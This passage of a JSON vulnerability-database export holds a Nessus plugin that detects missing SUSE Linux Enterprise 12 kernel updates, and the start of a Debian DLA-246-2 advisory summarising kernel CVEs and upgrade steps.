"2015-08-03T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-devel"], "id": "SUSE_SU-2015-1324-1.NASL", "href": "https://www.tenable.com/plugins/nessus/85180", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text 
and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1324-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85180);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-9728\", \"CVE-2014-9729\", \"CVE-2014-9730\", \"CVE-2014-9731\", \"CVE-2015-1805\", \"CVE-2015-3212\", \"CVE-2015-4036\", \"CVE-2015-4167\", \"CVE-2015-4692\", \"CVE-2015-5364\", \"CVE-2015-5366\");\n script_bugtraq_id(74664, 74951, 74963, 74964, 75001, 75142, 75510);\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : SUSE Linux Enterprise 12 kernel (SUSE-SU-2015:1324-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 kernel was updated to 3.12.44 to receive\nvarious security and bugfixes.\n\nThese features were added :\n\n - mpt2sas: Added Reply Descriptor Post Queue (RDPQ) Array\n support (bsc#854824).\n\n - mpt3sas: Bump mpt3sas driver version to 04.100.00.00\n (bsc#854817).\n\nFollowing security bugs were fixed :\n\n - CVE-2015-1805: iov overrun for failed atomic copy could\n have lead to DoS or privilege escalation (bsc#933429).\n\n - CVE-2015-3212: A race condition in the way the Linux\n kernel handled lists of associations in SCTP sockets\n could have lead to list corruption and kernel panics\n (bsc#936502).\n\n - CVE-2015-4036: DoS via memory corruption in vhost/scsi\n driver (bsc#931988).\n\n - CVE-2015-4167: Linux kernel built with the UDF file\n system(CONFIG_UDF_FS) support was vulnerable to a crash.\n It occurred while fetching inode information from a\n corrupted/malicious udf file system image 
(bsc#933907).\n\n - CVE-2015-4692: DoS via NULL pointer dereference in\n kvm_apic_has_events function (bsc#935542).\n\n - CVE-2015-5364: Remote DoS via flood of UDP packets with\n invalid checksums (bsc#936831).\n\n - CVE-2015-5366: Remote DoS of EPOLLET epoll applications\n via flood of UDP packets with invalid checksums\n (bsc#936831).\n\nSecurity issues already fixed in the previous update but not\nreferenced by CVE :\n\n - CVE-2014-9728: Kernel built with the UDF file\n system(CONFIG_UDF_FS) support were vulnerable to a crash\n (bsc#933904).\n\n - CVE-2014-9729: Kernel built with the UDF file\n system(CONFIG_UDF_FS) support were vulnerable to a crash\n (bsc#933904).\n\n - CVE-2014-9730: Kernel built with the UDF file\n system(CONFIG_UDF_FS) support were vulnerable to a crash\n (bsc#933904).\n\n - CVE-2014-9731: Kernel built with the UDF file\n system(CONFIG_UDF_FS) support were vulnerable to\n information leakage (bsc#933896).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=854817\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=854824\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=858727\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=866911\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=867362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=895814\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=903279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=907092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=908491\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=915183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=917630\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=918618\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=921430\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=924071\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=924526\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=926369\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=926953\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=927455\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=927697\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=927786\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=928131\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=929475\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=929696\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=929879\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=929974\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=930092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=930399\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=930579\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=930599\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=930972\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931124\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931403\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931538\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931620\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931860\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931988\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932793\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932897\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932898\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932899\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932900\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932967\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933117\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933429\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933637\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933896\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933904\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=934160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.suse.com/show_bug.cgi?id=935083\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935085\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935088\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935542\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935881\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936012\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936423\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936445\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936446\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936502\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936831\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937087\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.suse.com/show_bug.cgi?id=937609\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937612\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937613\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937616\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=938022\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=938023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=938024\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9728/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9729/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9730/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9731/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-1805/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3212/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4036/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4167/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4692/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5364/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.suse.com/security/cve/CVE-2015-5366/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151324-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1dcc37f6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2015-356=1\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2015-356=1\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2015-356=1\n\nSUSE Linux Enterprise Module for Public Cloud 12 :\n\nzypper in -t patch SUSE-SLE-Module-Public-Cloud-12-2015-356=1\n\nSUSE Linux Enterprise Live Patching 12 :\n\nzypper in -t patch SUSE-SLE-Live-Patching-12-2015-356=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2015-356=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-debuginfo-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debuginfo-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debugsource-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-devel-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-syms-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", 
reference:\"kernel-default-debugsource-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-devel-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-extra-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-syms-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.44-52.10.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUSE Linux Enterprise 12 kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T09:43:32", "description": "The linux-2.6 update issued as DLA-246-1 caused regressions. This\nupdate corrects the defective patches applied in that update causing\nthese problems. For reference the original advisory text follows.\n\nThis update fixes the CVEs described below.\n\nCVE-2011-5321\n\nJiri Slaby discovered that tty_driver_lookup_tty() may leak a\nreference to the tty driver. 
A local user could use this flaw to crash\nthe system.\n\nCVE-2012-6689\n\nPablo Neira Ayuso discovered that non-root user-space processes can\nsend forged Netlink notifications to other processes. A local user\ncould use this flaw for denial of service or privilege escalation.\n\nCVE-2014-3184\n\nBen Hawkes discovered that various HID drivers may over-read the\nreport descriptor buffer, possibly resulting in a crash if a HID with\na crafted descriptor is plugged in.\n\nCVE-2014-8159\n\nIt was found that the Linux kernel's InfiniBand/RDMA subsystem did not\nproperly sanitize input parameters while registering memory regions\nfrom user space via the (u)verbs API. A local user with access to a\n/dev/infiniband/uverbsX device could use this flaw to crash the system\nor, potentially, escalate their privileges on the system.\n\nCVE-2014-9683\n\nDmitry Chernenkov discovered that eCryptfs writes past the end of the\nallocated buffer during encrypted filename decoding, resulting in\nlocal denial of service.\n\nCVE-2014-9728 / CVE-2014-9729 / CVE-2014-9730 / CVE-2014-9731 /\nCVE-2015-4167\n\nCarl Henrik Lunde discovered that the UDF implementation is missing\nseveral necessary length checks. A local user that can mount devices\ncould use these various flaws to crash the system, to leak information\nfrom the kernel, or possibly for privilege escalation.\n\nCVE-2015-1805\n\nRed Hat discovered that the pipe iovec read and write implementations\nmay iterate over the iovec twice but will modify the iovec such that\nthe second iteration accesses the wrong memory. A local user could use\nthis flaw to crash the system or possibly for privilege escalation.\nThis may also result in data corruption and information leaks in pipes\nbetween non-malicious processes.\n\nCVE-2015-2041\n\nSasha Levin discovered that the LLC subsystem exposed some variables\nas sysctls with the wrong type. 
On a 64-bit kernel, this possibly\nallows privilege escalation from a process with CAP_NET_ADMIN\ncapability; it also results in a trivial information leak.\n\nCVE-2015-2042\n\nSasha Levin discovered that the RDS subsystem exposed some variables\nas sysctls with the wrong type. On a 64-bit kernel, this results in a\ntrivial information leak.\n\nCVE-2015-2830\n\nAndrew Lutomirski discovered that when a 64-bit task on an amd64\nkernel makes a fork(2) or clone(2) system call using int $0x80, the\n32-bit compatibility flag is set (correctly) but is not cleared on\nreturn. As a result, both seccomp and audit will misinterpret the\nfollowing system call by the task(s), possibly leading to a violation\nof security policy.\n\nCVE-2015-2922\n\nModio AB discovered that the IPv6 subsystem would process a router\nadvertisement that specifies no route but only a hop limit, which\nwould then be applied to the interface that received it. This can\nresult in loss of IPv6 connectivity beyond the local network.\n\nThis may be mitigated by disabling processing of IPv6 router\nadvertisements if they are not needed: sysctl\nnet.ipv6.conf.default.accept_ra=0 sysctl\nnet.ipv6.conf.<interface>.accept_ra=0\n\nCVE-2015-3339\n\nIt was found that the execve(2) system call can race with inode\nattribute changes made by chown(2). 
Although chown(2) clears the\nsetuid/setgid bits of a file if it changes the respective owner ID,\nthis race condition could result in execve(2) setting effective\nuid/gid to the new owner ID, a privilege escalation.\n\nFor the oldoldstable distribution (squeeze), these problems have been\nfixed in version 2.6.32-48squeeze12.\n\nFor the oldstable distribution (wheezy), these problems were fixed in\nlinux version 3.2.68-1+deb7u1 or earlier, except for CVE-2015-1805 and\nCVE-2015-4167 which will be fixed soon.\n\nFor the stable distribution (jessie), these problems were fixed in\nlinux version 3.16.7-ckt11-1 or earlier, except for CVE-2015-4167\nwhich will be fixed later.\n\nWe recommend that you upgrade your linux-2.6 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 19, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-06-18T00:00:00", "title": "Debian DLA-246-2 : linux-2.6 regression update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2830", "CVE-2015-2922", "CVE-2015-3339", "CVE-2014-9728", "CVE-2014-9730", "CVE-2014-8159", "CVE-2011-5321", "CVE-2012-6689", "CVE-2014-9729", "CVE-2014-9683", "CVE-2015-4167", "CVE-2015-2041", "CVE-2014-9731", "CVE-2014-3184", "CVE-2015-2042", "CVE-2015-1805"], "modified": "2015-06-18T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-amd64", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64-dbg", "cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:firmware-linux-free", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-vserver", 
